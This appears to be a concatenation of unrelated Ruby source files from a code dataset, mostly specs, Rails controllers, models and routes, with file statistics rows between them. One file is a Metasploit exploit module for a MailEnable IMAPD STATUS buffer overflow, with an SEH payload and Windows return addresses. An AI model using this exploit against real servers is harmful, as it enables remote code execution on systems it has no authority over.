request = stub_get("https://ghe.local/api/v3/app/installations/1234")
response = client.installation(1234)
assert_requested request
end
end # .installation
describe ".find_installation_repositories_for_user" do
it "returns repositories for a user" do
response = @client.find_installation_repositories_for_user(installation)
expect(response.total_count).not_to be_nil
expect(response.repositories).to be_kind_of(Array)
assert_requested :get, github_url("/user/installations/#{installation}/repositories")
end
it "works for GitHub Enterprise installs" do
client = Octokit::Client.new \
bearer_token: new_jwt_token,
api_endpoint: "https://ghe.local/api/v3"
request = stub_get("https://ghe.local/api/v3/user/installations/1234/repositories")
response = client.find_installation_repositories_for_user(1234)
assert_requested request
end
it "allows auto_pagination", :vcr do
@client.auto_paginate = true
response = @client.find_installation_repositories_for_user(installation, per_page: 1)
expect(response.total_count).to eq 2
expect(response.repositories.count).to eq 2
expect(response.repositories).to be_kind_of(Array)
end
end # .find_installation_repositories_for_user
describe ".create_integration_installation_access_token" do
it "creates an access token for the installation" do
allow(@jwt_client).to receive(:octokit_warn)
response = @jwt_client.create_integration_installation_access_token(installation)
expect(response).to be_kind_of(Sawyer::Resource)
expect(response.token).not_to be_nil
expect(response.expires_at).not_to be_nil
assert_requested :post, github_url("/app/installations/#{installation}/access_tokens")
expect(@jwt_client).to have_received(:octokit_warn).with(/Deprecated/)
end
end # .create_integration_installation_access_token
describe ".create_app_installation_access_token" do
it "creates an access token for the installation" do
response = @jwt_client.create_app_installation_access_token(installation)
expect(response).to be_kind_of(Sawyer::Resource)
expect(response.token).not_to be_nil
expect(response.expires_at).not_to be_nil
assert_requested :post, github_url("/app/installations/#{installation}/access_tokens")
end
it "works for GitHub Enterprise installs" do
client = Octokit::Client.new \
bearer_token: new_jwt_token,
api_endpoint: "https://ghe.local/api/v3"
path = "app/installations/1234/access_tokens"
request = stub_post("https://ghe.local/api/v3/#{path}")
response = client.create_app_installation_access_token(1234)
assert_requested request
end
end # .create_app_installation_access_token
describe ".delete_installation" do
it "deletes an installation" do
response = @jwt_client.delete_installation(installation, accept: Octokit::Preview::PREVIEW_TYPES[:uninstall_github_app])
expect(response).to be_truthy
end
end # .delete_installation
context "with app installation access token" do
let(:installation_client) do
token = @jwt_client.create_app_installation_access_token(installation).token
use_vcr_placeholder_for(token, '<INTEGRATION_INSTALLATION_TOKEN>')
Octokit::Client.new(:access_token => token)
end
let(:ghe_installation_client) do
Octokit::Client.new \
access_token: "v1.1f699f1069f60xxx",
api_endpoint: "https://ghe.local/api/v3"
end
describe ".list_integration_installation_repositories" do
it "lists the installations repositories" do
allow(installation_client).to receive(:octokit_warn)
response = installation_client.list_integration_installation_repositories()
expect(response.total_count).not_to be_nil
expect(response.repositories).to be_kind_of(Array)
expect(installation_client).to have_received(:octokit_warn).with(/Deprecated/)
end
end # .list_integration_installation_repositories
describe ".list_app_installation_repositories" do
it "lists the installations repositories" do
response = installation_client.list_app_installation_repositories()
expect(response.total_count).not_to be_nil
expect(response.repositories).to be_kind_of(Array)
end
it "works for GitHub Enterprise installs" do
request = stub_get("https://ghe.local/api/v3/installation/repositories")
response = ghe_installation_client.list_app_installation_repositories()
assert_requested request
end
it "allows auto_pagination", :vcr do
installation_client.auto_paginate = true
response = installation_client.list_app_installation_repositories({per_page: 1})
expect(response.total_count).to eq 2
expect(response.repositories.count).to eq 2
expect(response.repositories).to be_kind_of(Array)
end
end # .list_app_installation_repositories
end # with app installation access token
context "with repository" do
let(:repository) { test_org_repo }
before(:each) do
@repo = @client.create_repository(
"#{test_github_repository}_#{Time.now.to_f}",
:organization => test_github_org
)
end
after(:each) do
@client.delete_repository(@repo.full_name)
end
describe ".add_repository_to_integration_installation" do
it "adds the repository to the installation" do
allow(@client).to receive(:octokit_warn)
response = @client.add_repository_to_integration_installation(installation, @repo.id)
expect(response).to be_truthy
expect(@client).to have_received(:octokit_warn).with(/Deprecated/)
end
end # .add_repository_to_integration_installation
describe ".add_repository_to_app_installation" do
it "adds the repository to the installation" do
response = @client.add_repository_to_app_installation(installation, @repo.id)
expect(response).to be_truthy
end
end # .add_repository_to_app_installation
context 'with installed repository on installation' do
before(:each) do
@client.add_repository_to_app_installation(installation, @repo.id)
end
describe ".remove_repository_from_integration_installation" do
it "removes the repository from the installation" do
allow(@client).to receive(:octokit_warn)
response = @client.remove_repository_from_integration_installation(installation, @repo.id)
expect(response).to be_truthy
expect(@client).to have_received(:octokit_warn).with(/Deprecated/)
end
end # .remove_repository_from_integration_installation
describe ".remove_repository_from_app_installation" do
it "removes the repository from the installation" do
response = @client.remove_repository_from_app_installation(installation, @repo.id)
expect(response).to be_truthy
end
end # .remove_repository_from_app_installation
end # with installed repository on installation
end # with repository
context "with repository on GitHub Enterprise" do
let(:ghe_client) do
Octokit::Client.new \
access_token: "x" * 40,
api_endpoint: "https://ghe.local/api/v3"
end
describe ".add_repository_to_app_installation" do
it "works for GitHub Enterprise installs" do
request = stub_put("https://ghe.local/api/v3/user/installations/1234/repositories/1234")
response = ghe_client.add_repository_to_app_installation(1234, 1234)
assert_requested request
end
end # .add_repository_to_app_installation
describe ".remove_repository_from_app_installation" do
it "works for GitHub Enterprise installs" do
request = stub_delete("https://ghe.local/api/v3/user/installations/1234/repositories/1234")
response = ghe_client.remove_repository_from_app_installation(1234, 1234)
assert_requested request
end
end # .remove_repository_from_app_installation
end # with repository on GitHub Enterprise
end # with app installation
end
| 37.224138 | 128 | 0.701383 |
7a5d0cd47bf065c09118572268f0bb971755ce97 | 1,190 | require "spec_helper"
require "core_ext/hash_replace_key"
RSpec.describe HashReplaceKey do
describe "#replace_key" do
it "replaces a key with a given replacement and returns a new hash" do
original = { foo: "bar" }
new_hash = original.replace_key(:foo, :baz)
expect(new_hash).to include(baz: "bar")
expect(new_hash).not_to include(foo: "bar")
expect(original.object_id).not_to eq(new_hash.object_id)
end
end
describe "#replace_key!" do
it "replaces a key with a given replacement in place" do
original = { foo: "bar" }
new_hash = original.replace_key!(:foo, :baz)
expect(new_hash).to include(baz: "bar")
expect(new_hash).not_to include(foo: "bar")
expect(original.object_id).to eq(new_hash.object_id)
end
it "does nothing if the original key is missing" do
original = { foo: "bar" }
new_hash = original.replace_key(:baz, :boo)
expect(original).to eq(new_hash)
end
it "copies nil values where the key is present" do
original = { bar: nil }
new_hash = original.replace_key!(:bar, :another)
expect(new_hash).to include(another: nil)
end
end
end
| 26.444444 | 74 | 0.660504 |
1a672c410dea637750b23c8b75acf46120b794ef | 1,032 | #
# Project:: Ansible Role - Linux Users
#
# Copyright 2020, Route 1337, LLC, All Rights Reserved.
#
# Maintainers:
# - Matthew Ahrenstein: [email protected]
#
# See LICENSE
#
# Prereqs tests
if ['ubuntu', 'centos'].include?(os[:name])
# Verify zsh is installed
describe package('zsh') do
it { should be_installed }
end
# Verify the sysadmins group exists
describe group('sysadmins') do
it { should exist }
its('gid') { should eq 1337}
end
# Verify the sysusers group exists
describe group('sysusers') do
it { should exist }
its('gid') { should eq 8737}
end
# Verify the svcaccounts group exists
describe group('svcaccounts') do
it { should exist }
its('gid') { should eq 7782}
end
# Verify sysadmins and svcaccounts have password-less sudo and sysusers do not get mentioned
describe file('/etc/sudoers') do
its('content') { should match /%sysadmins ALL=\(ALL\) NOPASSWD: ALL/ }
its('content') { should_not match /sysusers/ }
end
else
# Do nothing
end
| 21.5 | 94 | 0.670543 |
ffc87de98d2f1195e767251b3e510d73b1eddf22 | 222 | require_relative './deploy/logger'
require_relative './deploy/aws'
require_relative '../tasks/task_builder'
module Deploy
def logger(file = 'log/deploy.log')
Logger.logger(file)
end
module_function :logger
end
| 18.5 | 40 | 0.747748 |
87bc689ecfea40c867cba654548f8dac9cab90d2 | 524 | require 'spec_helper'
describe DeleteClassificationWorker do
it 'deletes the classification if it exists' do
workflow = create :workflow
subject = create :subject
classification = create :classification, workflow: workflow, subject: subject
described_class.new.perform(classification.id)
expect(Classification.find_by_id(classification.id)).to be_nil
end
it 'does nothing if the classification is gone' do
expect do
described_class.new.perform(-1)
end.not_to raise_error
end
end
| 27.578947 | 81 | 0.755725 |
1c26512224db743fc409153533e7828ca8f84558 | 1,852 | class TasksController < ApplicationController
before_action :set_task, only: [ :show, :update, :destroy ]
def index
tasks = TaskBlueprint.render Task.sorted
render json: tasks
end
def show
render json: TaskBlueprint.render(@task, view: :extended)
end
def create
if @task = Task.create(task_params)
render json: TaskBlueprint.render(@task), status: :created
else
render json: { errors: @task.errors.full_messages }, status: :bad_request
end
end
def update
if @task.update(task_params)
render json: TaskBlueprint.render(@task)
else
render json: { errors: @task.errors.full_messages }, status: :bad_request
end
end
def update_order
task = Task.find(params[:task_id])
old_status_id = task.status_id
task = task.update(task_params)
begin
task_ids = task_order_params[:ids_in_order]
tasks = Task.where(id: task_ids).order(:order)
# check for extra id send down
ids_difference = task_ids - tasks.pluck(:id)
if ids_difference.length > 0
raise "Unknown column detected"
end
# TODO: check for id not sent in ids_in_order
tasks.each do |status|
status.update(order: task_ids.find_index(status.id))
end
render json: tasks.reload.map {|task| TaskBlueprint.render(task) }
rescue Exception => e
task.update(status_id: old_status_id) # revert any potential status change
render json: e, status: :bad_request
end
end
def destroy
@task.destroy
render status: :no_content
end
private
def task_params
params.require(:task).permit(:id, :uid, :title, :description, :task_id, :project_id, :status_id, :priority, :order)
end
def task_order_params
params.permit(ids_in_order: [])
end
def set_task
@task = Task.find(params[:id])
end
end
| 25.722222 | 119 | 0.675486 |
2624d01cf0143c551d3ab1e0f7ad65c8c2dad24f | 1,214 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::MediaServices::Mgmt::V2019_05_01_preview
module Models
#
# The LiveEvent action input parameter definition.
#
class LiveEventActionInput
include MsRestAzure
# @return [Boolean] The flag indicates if remove LiveOutputs on Stop.
attr_accessor :remove_outputs_on_stop
#
# Mapper for LiveEventActionInput class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'LiveEventActionInput',
type: {
name: 'Composite',
class_name: 'LiveEventActionInput',
model_properties: {
remove_outputs_on_stop: {
client_side_validation: true,
required: false,
serialized_name: 'removeOutputsOnStop',
type: {
name: 'Boolean'
}
}
}
}
}
end
end
end
end
| 26.391304 | 75 | 0.582372 |
6199699787216c992534742a8d198dff23ed0fa5 | 796 | # Uncomment this if you reference any of your controllers in activate
# require_dependency 'application'
class FlashContentExtension < Radiant::Extension
version "0.1"
description "Adds tags to make it easier to embed Adobe Flash content"
url "http://github.com/ceaser/radiant-flash_content-extension"
# define_routes do |map|
# map.connect 'admin/flash_content/:action', :controller => 'admin/flash_content'
# end
def activate
begin
return if ActiveRecord::Migrator.current_version == 0
rescue
return
end
Page.send :include, FlashContentTags
Radiant::Config["flash_content.required_version"] = "9.0.0" if Radiant::Config["flash_content.required_version"].nil?
end
def deactivate
# admin.tabs.remove "Flash Content"
end
end | 27.448276 | 121 | 0.722362 |
28ac102db5f06a02cc87505039b378254d1c32e1 | 149 | class CreateUserBadges < ActiveRecord::Migration
def change
create_table :user_badges do |t|
t.timestamps null: false
end
end
end
| 16.555556 | 48 | 0.711409 |
0391a5f1ac7ac3d979f0b462073f3b2c624b4d16 | 4,484 | # encoding: UTF-8
require 'minitest/autorun'
require 'yaml'
require 'big_query'
require 'pry-byebug'
module BigQuery
class Client
attr_accessor :client
end
end
class BigQueryTest < MiniTest::Unit::TestCase
def setup
@bq = BigQuery::Client.new(config)
if @bq.tables_formatted.include? 'test'
@bq.delete_table('test')
end
result = @bq.create_table('test', id: { type: 'INTEGER', mode: 'REQUIRED' }, type: { type: 'STRING', mode: 'NULLABLE' })
end
def config
return @config if @config
config_data ||= File.expand_path(File.dirname(__FILE__) + "/../.bigquery_settings.yml")
@config = YAML.load_file(config_data)
end
def test_faraday_option_config
assert_equal @bq.client.connection.options.timeout, 999
end
def test_for_tables
table = @bq.tables.select{|t| t['id'] == "#{config['project_id']}:#{config['dataset']}.test"}.first
assert_equal table['kind'], "bigquery#table"
assert_equal table['tableReference']['tableId'], 'test'
end
def test_for_tables_formatted
result = @bq.tables_formatted
assert_includes result, 'test'
end
def test_for_table_data
result = @bq.table_data('test')
assert_kind_of Array, result
end
def test_for_create_table
if @bq.tables_formatted.include? 'test123'
@bq.delete_table('test123')
end
schema = {
id: { type: 'INTEGER'},
city: {
name:"city",
type:"RECORD",
mode: "nullable",
fields: {
id: {name:"id", type:"INTEGER" },
name: {name:"name", type:"STRING" },
country: { name:"country", type:"STRING" },
time: { name:"time", type:"TIMESTAMP" }
}
}
}
result = @bq.create_table('test123', schema)
assert_equal result['kind'], "bigquery#table"
assert_equal result['tableReference']['tableId'], "test123"
assert_equal result['schema']['fields'], [
{"name"=>"id", "type"=>"INTEGER"},
{
"name"=>"city",
"type"=>"RECORD",
"fields"=>[
{"name"=>"id", "type"=>"INTEGER"},
{"name"=>"name", "type"=>"STRING"},
{"name"=>"country", "type"=>"STRING"},
{"name"=>"time", "type"=>"TIMESTAMP"}
]
}
]
end
def test_for_delete_table
if [email protected]_formatted.include? 'test123'
@bq.create_table('test123', id: { type: 'INTEGER' })
end
result = @bq.delete_table('test123')
tables = @bq.tables_formatted
refute_includes tables, 'test123'
end
def test_for_describe_table
result = @bq.describe_table('test')
assert_equal result['kind'], "bigquery#table"
assert_equal result['type'], "TABLE"
assert_equal result['id'], "#{config['project_id']}:#{config['dataset']}.test"
assert_equal result['tableReference']['tableId'], 'test'
assert_equal result['schema']['fields'][0]['name'], 'id'
assert_equal result['schema']['fields'][0]['type'], 'INTEGER'
assert_equal result['schema']['fields'][0]['mode'], 'REQUIRED'
assert_equal result['schema']['fields'][1]['name'], 'type'
assert_equal result['schema']['fields'][1]['type'], 'STRING'
assert_equal result['schema']['fields'][1]['mode'], 'NULLABLE'
end
def test_for_query
result = @bq.query("SELECT * FROM [#{config['dataset']}.test] LIMIT 1")
assert_equal result['kind'], "bigquery#queryResponse"
assert_equal result['jobComplete'], true
end
def test_for_query_useQueryCache
result = @bq.query("SELECT * FROM [#{config['dataset']}.test] LIMIT 1", useQueryCache: true)
result = @bq.query("SELECT * FROM [#{config['dataset']}.test] LIMIT 1", useQueryCache: true)
assert_equal result['cacheHit'], true
end
def test_for_query_dryRun
result = @bq.query("SELECT * FROM [#{config['dataset']}.test] LIMIT 1", dryRun: true)
assert_equal result['jobReference']['jobId'], nil
end
def test_for_insert
result = @bq.insert('test' ,"id" => 123, "type" => "Task")
assert_equal result['kind'], "bigquery#tableDataInsertAllResponse"
end
def test_for_insert_array
data = [
{"id" => 123, "type" => "Task"},
{"id" => 321, "type" => "Other task"}
]
result = @bq.insert('test' , data)
assert_equal result['kind'], "bigquery#tableDataInsertAllResponse"
end
def test_for_insert_job
result = @bq.insert_job(query: {query: "SELECT * FROM [#{config['dataset']}.test] LIMIT 1"})
assert_equal result['kind'], "bigquery#job"
end
end
| 28.201258 | 124 | 0.624665 |
6a711c17af4db3919d4314a206e586aadd2b9acf | 406 | module Diversities
class ReligionForm < Form
RELIGION = ["no-religion",
"christian-including-church-of-england-catholic-protestant-and-all-other-christian-denominations",
"buddhist", "hindu", "jewish", "muslim", "sikh",
"prefer-not-to-say", "any-other-religion"].freeze
attribute :religion, :string
attribute :religion_text, :string
end
end
| 33.833333 | 114 | 0.64532 |
ff0cd8c57f2b874823b9c73494232efeccbc34a1 | 2,084 | # frozen_string_literal: true
# Model class for 1910 US Census records.
class Census1910Record < CensusRecord
self.table_name = 'census_1910_records'
alias_attribute :profession, :occupation
belongs_to :locality, inverse_of: :census1910_records
validates :language_spoken, vocabulary: { name: :language, allow_blank: true }
validates :mother_tongue, :mother_tongue_father, :mother_tongue_mother, vocabulary: { name: :language, allow_blank: true }
validates :dwelling_number, presence: true
auto_strip_attributes :industry, :employment
define_enumeration :race, %w[W B Mu Ch Jp In Ot]
define_enumeration :marital_status, %w[S M_or_M1 M2_or_M3 Wd D]
def year
1910
end
COLUMNS = {
street_house_number: '2nd Column on the Left',
street_prefix: '1st Column on the Left',
street_name: '1st Column on the Left',
street_suffix: '1st Column on the Left',
dwelling_number: 1,
family_id: 2,
last_name: 3,
first_name: 3,
middle_name: 3,
name_prefix: 3,
name_suffix: 3,
relation_to_head: 4,
race: 6,
sex: 5,
age: 7,
age_months: 7,
marital_status: 8,
years_married: 9,
num_children_born: 10,
num_children_alive: 11,
pob: 12,
mother_tongue: 12,
pob_father: 13,
mother_tongue_father: 13,
pob_mother: 14,
mother_tongue_mother: 14,
year_immigrated: 15,
naturalized_alien: 16,
language_spoken: 17,
occupation: 18,
industry: 19,
employment: 20,
unemployed: 21,
unemployed_weeks_1909: 22,
can_read: 23,
can_write: 24,
attended_school: 25,
owned_or_rented: 26,
mortgage: 27,
farm_or_house: 28,
num_farm_sched: 29,
civil_war_vet: 30,
blind: 31,
dumb: 32
}.freeze
IMAGES = {
page_number: '1910/sheet-side.png',
page_side: '1910/sheet-side.png',
ward: '1910/sheet-side.png',
enum_dist: '1910/sheet-side.png',
first_name: '1910/names.png',
middle_name: '1910/names.png',
last_name: '1910/names.png',
civil_war_vet: '1910/punch-card-symbols.png'
}.freeze
end
| 25.108434 | 124 | 0.681862 |
6a0260025206103e0de7d0e235c0a256bc9329e3 | 153 | # frozen_string_literal: true
class ETL::PersonSyncer < ETL::Syncer
def origin_class
::Person
end
def target_class
ETL::Person
end
end
| 12.75 | 37 | 0.705882 |
f7f10674a828e5dee544d44e11939603235b3644 | 1,637 | class PlacesController < ApplicationController
def index
@places = Place.all.paginate(:page => params[:page])
end
def show
@place = Place.find(params[:id])
end
# def new
# @place = Place.new
# end
# def create
# @place = Place.new(place_params)
# if @place.save
# redirect_to @place
# else
# render 'new'
# end
# end
# def edit
# @place = Place.find(params[:id])
# end
# def update
# @place = Place.find(params[:id])
# if @place.update_attributes(place_params)
# redirect_to @place
# else
# render 'edit'
# end
# end
def filter_hoteles
@places = Place.where("categoria like '%otel%'").paginate(:page => params[:page])
render 'index'
end
def filter_hostales
@places = Place.where("categoria like '%ostal%'").paginate(:page => params[:page])
render 'index'
end
def filter_albergues
@places = Place.where("categoria like '%lberg%'").paginate(:page => params[:page])
render 'index'
end
def filter_pensiones
@places = Place.where("categoria like '%ensi%'").paginate(:page => params[:page])
render 'index'
end
def filter_aparts
@places = Place.where("categoria like '%partam%'").paginate(:page => params[:page])
render 'index'
end
def filter_campings
@places = Place.where("categoria like '%amping%'").paginate(:page => params[:page])
render 'index'
end
def mapa
@places = Place.all
render 'mapa'
end
private
def place_params
params.require(:place).permit(:name, :address, :postal, :phone, :email, :url, :accesibilidad, :comment, :categoria, :habitaciones, :camas,:latitude,:longitude, :img)
end
end
| 20.987179 | 173 | 0.651802 |
ffa0505bc36204d0f4328d749a0c538ca5461793 | 2,142 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Imap
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'MailEnable IMAPD (1.54) STATUS Request Buffer Overflow',
'Description' => %q{
MailEnable's IMAP server contains a buffer overflow
vulnerability in the STATUS command. With proper
credentials, this could allow for the execution of arbitrary
code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2005-2278'],
[ 'OSVDB', '17844'],
[ 'BID', '14243'],
[ 'URL', 'http://www.nessus.org/plugins/index.php?view=single&id=19193'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 450,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
['MailEnable 1.54 Pro Universal', { 'Rets' => [9273, 0x1001c019] }], #MEAISP.DLL
['Windows XP Pro SP0/SP1 English', { 'Rets' => [9273, 0x71aa32ad] }],
['Windows 2000 Pro English ALL', { 'Rets' => [9273, 0x75022ac4] }],
['Windows 2003 Server English', { 'Rets' => [9273, 0x7ffc0638] }],
],
'DisclosureDate' => 'Jul 13 2005',
'DefaultTarget' => 0))
end
def exploit
connect_login
seh = generate_seh_payload(target['Rets'][1])
buf = rand_text_alphanumeric(target['Rets'][0])
req = "a001 STATUS \".\x00" + buf + seh
req << "\" (UIDNEXT UIDVALIDITY MESSAGES UNSEEN RECENT)\r\n"
sock.put(req)
handler
disconnect
end
end
| 30.169014 | 92 | 0.548553 |
ac81a2aac7690c1a7043fec7403826d5bb22614b | 18,798 | require 'sidekiq/web'
require 'api/api'
Gitlab::Application.routes.draw do
if Gitlab::Sherlock.enabled?
namespace :sherlock do
resources :transactions, only: [:index, :show] do
resources :queries, only: [:show]
resources :file_samples, only: [:show]
collection do
delete :destroy_all
end
end
end
end
namespace :ci do
# CI API
Ci::API::API.logger Rails.logger
mount Ci::API::API => '/api'
resource :lint, only: [:show, :create]
resources :projects do
collection do
post :add
get :disabled
end
member do
get :status, to: 'projects#badge'
get :integration
post :toggle_shared_runners
end
resources :runner_projects, only: [:create, :destroy]
end
resource :user_sessions do
get :auth
get :callback
end
namespace :admin do
resources :runners, only: [:index, :show, :update, :destroy] do
member do
put :assign_all
get :resume
get :pause
end
end
resources :events, only: [:index]
resources :projects do
resources :runner_projects
end
resources :builds, only: :index
resource :application_settings, only: [:show, :update]
end
root to: 'projects#index'
end
use_doorkeeper do
controllers applications: 'oauth/applications',
authorized_applications: 'oauth/authorized_applications',
authorizations: 'oauth/authorizations'
end
# Autocomplete
get '/autocomplete/users' => 'autocomplete#users'
get '/autocomplete/users/:id' => 'autocomplete#user'
# Search
get 'search' => 'search#show'
get 'search/autocomplete' => 'search#autocomplete', as: :search_autocomplete
# API
API::API.logger Rails.logger
mount API::API => '/api'
# Get all keys of user
get ':username.keys' => 'profiles/keys#get_keys' , constraints: { username: /.*/ }
constraint = lambda { |request| request.env['warden'].authenticate? and request.env['warden'].user.admin? }
constraints constraint do
mount Sidekiq::Web, at: '/admin/sidekiq', as: :sidekiq
end
# Enable Grack support
mount Grack::AuthSpawner, at: '/', constraints: lambda { |request| /[-\/\w\.]+\.git\//.match(request.path_info) }, via: [:get, :post, :put]
# Help
get 'help' => 'help#index'
get 'help/:category/:file' => 'help#show', as: :help_page, constraints: { category: /.*/, file: /[^\/\.]+/ }
get 'help/shortcuts'
get 'help/ui' => 'help#ui'
#
# Global snippets
#
resources :snippets do
member do
get 'raw'
end
end
get '/s/:username' => 'snippets#index', as: :user_snippets, constraints: { username: /.*/ }
#
# Invites
#
resources :invites, only: [:show], constraints: { id: /[A-Za-z0-9_-]+/ } do
member do
post :accept
match :decline, via: [:get, :post]
end
end
# Spam reports
resources :abuse_reports, only: [:new, :create]
#
# Import
#
namespace :import do
resource :github, only: [:create, :new], controller: :github do
get :status
get :callback
get :jobs
end
resource :gitlab, only: [:create, :new], controller: :gitlab do
get :status
get :callback
get :jobs
end
resource :bitbucket, only: [:create, :new], controller: :bitbucket do
get :status
get :callback
get :jobs
end
resource :gitorious, only: [:create, :new], controller: :gitorious do
get :status
get :callback
get :jobs
end
resource :google_code, only: [:create, :new], controller: :google_code do
get :status
post :callback
get :jobs
get :new_user_map, path: :user_map
post :create_user_map, path: :user_map
end
resource :fogbugz, only: [:create, :new], controller: :fogbugz do
get :status
post :callback
get :jobs
get :new_user_map, path: :user_map
post :create_user_map, path: :user_map
end
end
#
# Uploads
#
scope path: :uploads do
# Note attachments and User/Group/Project avatars
get ":model/:mounted_as/:id/:filename",
to: "uploads#show",
constraints: { model: /note|user|group|project/, mounted_as: /avatar|attachment/, filename: /[^\/]+/ }
# Project markdown uploads
get ":namespace_id/:project_id/:secret/:filename",
to: "projects/uploads#show",
constraints: { namespace_id: /[a-zA-Z.0-9_\-]+/, project_id: /[a-zA-Z.0-9_\-]+/, filename: /[^\/]+/ }
end
# Redirect old note attachments path to new uploads path.
get "files/note/:id/:filename",
to: redirect("uploads/note/attachment/%{id}/%{filename}"),
constraints: { filename: /[^\/]+/ }
#
# Explore area
#
namespace :explore do
resources :projects, only: [:index] do
collection do
get :trending
get :starred
end
end
resources :groups, only: [:index]
resources :snippets, only: [:index]
root to: 'projects#trending'
end
# Compatibility with old routing
get 'public' => 'explore/projects#index'
get 'public/projects' => 'explore/projects#index'
#
# Admin Area
#
namespace :admin do
resources :users, constraints: { id: /[a-zA-Z.\/0-9_\-]+/ } do
resources :keys, only: [:show, :destroy]
resources :identities, only: [:index, :edit, :update, :destroy]
delete 'stop_impersonation' => 'impersonation#destroy', on: :collection
member do
get :projects
get :keys
get :groups
put :team_update
put :block
put :unblock
put :unlock
put :confirm
post 'impersonate' => 'impersonation#create'
patch :disable_two_factor
delete 'remove/:email_id', action: 'remove_email', as: 'remove_email'
end
end
resources :abuse_reports, only: [:index, :destroy]
resources :applications
resources :groups, constraints: { id: /[^\/]+/ } do
member do
put :members_update
end
end
resources :deploy_keys, only: [:index, :new, :create, :destroy]
resources :hooks, only: [:index, :create, :destroy] do
get :test
end
resources :broadcast_messages, only: [:index, :create, :destroy]
resource :logs, only: [:show]
resource :background_jobs, controller: 'background_jobs', only: [:show]
resources :namespaces, path: '/projects', constraints: { id: /[a-zA-Z.0-9_\-]+/ }, only: [] do
root to: 'projects#index', as: :projects
resources(:projects,
path: '/',
constraints: { id: /[a-zA-Z.0-9_\-]+/ },
only: [:index, :show]) do
root to: 'projects#show'
member do
put :transfer
end
end
end
resource :application_settings, only: [:show, :update] do
resources :services
end
resources :labels
root to: 'dashboard#index'
end
#
# Profile Area
#
resource :profile, only: [:show, :update] do
member do
get :audit_log
get :applications
put :reset_private_token
put :update_username
end
scope module: :profiles do
resource :account, only: [:show, :update] do
member do
delete :unlink
end
end
resource :notifications, only: [:show, :update]
resource :password, only: [:new, :create, :edit, :update] do
member do
put :reset
end
end
resource :preferences, only: [:show, :update]
resources :keys
resources :emails, only: [:index, :create, :destroy]
resource :avatar, only: [:destroy]
resource :two_factor_auth, only: [:new, :create, :destroy] do
member do
post :codes
end
end
end
end
get 'u/:username/calendar' => 'users#calendar', as: :user_calendar,
constraints: { username: /.*/ }
get 'u/:username/calendar_activities' => 'users#calendar_activities', as: :user_calendar_activities,
constraints: { username: /.*/ }
get '/u/:username' => 'users#show', as: :user,
constraints: { username: /[a-zA-Z.0-9_\-]+(?<!\.atom)/ }
#
# Dashboard Area
#
resource :dashboard, controller: 'dashboard', only: [] do
get :issues
get :merge_requests
get :activity
scope module: :dashboard do
resources :milestones, only: [:index, :show]
resources :groups, only: [:index]
resources :snippets, only: [:index]
resources :projects, only: [:index] do
collection do
get :starred
end
end
end
root to: "dashboard/projects#index"
end
#
# Groups Area
#
resources :groups, constraints: { id: /[a-zA-Z.0-9_\-]+(?<!\.atom)/ } do
member do
get :issues
get :merge_requests
get :projects
end
scope module: :groups do
resources :group_members, only: [:index, :create, :update, :destroy] do
post :resend_invite, on: :member
delete :leave, on: :collection
end
resource :avatar, only: [:destroy]
resources :milestones, only: [:index, :show, :update, :new, :create]
end
end
resources :projects, constraints: { id: /[^\/]+/ }, only: [:index, :new, :create]
devise_for :users, controllers: { omniauth_callbacks: :omniauth_callbacks, registrations: :registrations , passwords: :passwords, sessions: :sessions, confirmations: :confirmations }
devise_scope :user do
get '/users/auth/:provider/omniauth_error' => 'omniauth_callbacks#omniauth_error', as: :omniauth_error
end
root to: "root#index"
#
# Project Area
#
resources :namespaces, path: '/', constraints: { id: /[a-zA-Z.0-9_\-]+/ }, only: [] do
resources(:projects, constraints: { id: /[a-zA-Z.0-9_\-]+(?<!\.atom)/ }, except:
[:new, :create, :index], path: "/") do
member do
put :transfer
delete :remove_fork
post :archive
post :unarchive
post :toggle_star
post :markdown_preview
get :autocomplete_sources
get :activity
end
scope module: :projects do
# Blob routes:
get '/new/*id', to: 'blob#new', constraints: { id: /.+/ }, as: 'new_blob'
post '/create/*id', to: 'blob#create', constraints: { id: /.+/ }, as: 'create_blob'
get '/edit/*id', to: 'blob#edit', constraints: { id: /.+/ }, as: 'edit_blob'
put '/update/*id', to: 'blob#update', constraints: { id: /.+/ }, as: 'update_blob'
post '/preview/*id', to: 'blob#preview', constraints: { id: /.+/ }, as: 'preview_blob'
scope do
get(
'/blob/*id/diff',
to: 'blob#diff',
constraints: { id: /.+/, format: false },
as: :blob_diff
)
get(
'/blob/*id',
to: 'blob#show',
constraints: { id: /.+/, format: false },
as: :blob
)
delete(
'/blob/*id',
to: 'blob#destroy',
constraints: { id: /.+/, format: false }
)
put(
'/blob/*id',
to: 'blob#update',
constraints: { id: /.+/, format: false }
)
post(
'/blob/*id',
to: 'blob#create',
constraints: { id: /.+/, format: false }
)
end
scope do
get(
'/raw/*id',
to: 'raw#show',
constraints: { id: /.+/, format: /(html|js)/ },
as: :raw
)
end
scope do
get(
'/tree/*id',
to: 'tree#show',
constraints: { id: /.+/, format: /(html|js)/ },
as: :tree
)
end
scope do
post(
'/create_dir/*id',
to: 'tree#create_dir',
constraints: { id: /.+/ },
as: 'create_dir'
)
end
scope do
get(
'/blame/*id',
to: 'blame#show',
constraints: { id: /.+/, format: /(html|js)/ },
as: :blame
)
end
scope do
get(
'/commits/*id',
to: 'commits#show',
constraints: { id: /(?:[^.]|\.(?!atom$))+/, format: /atom/ },
as: :commits
)
end
resource :avatar, only: [:show, :destroy]
resources :commit, only: [:show], constraints: { id: /[[:alnum:]]{6,40}/ } do
member do
get :branches
get :builds
post :cancel_builds
post :retry_builds
end
end
resources :compare, only: [:index, :create]
resources :network, only: [:show], constraints: { id: /(?:[^.]|\.(?!json$))+/, format: /json/ }
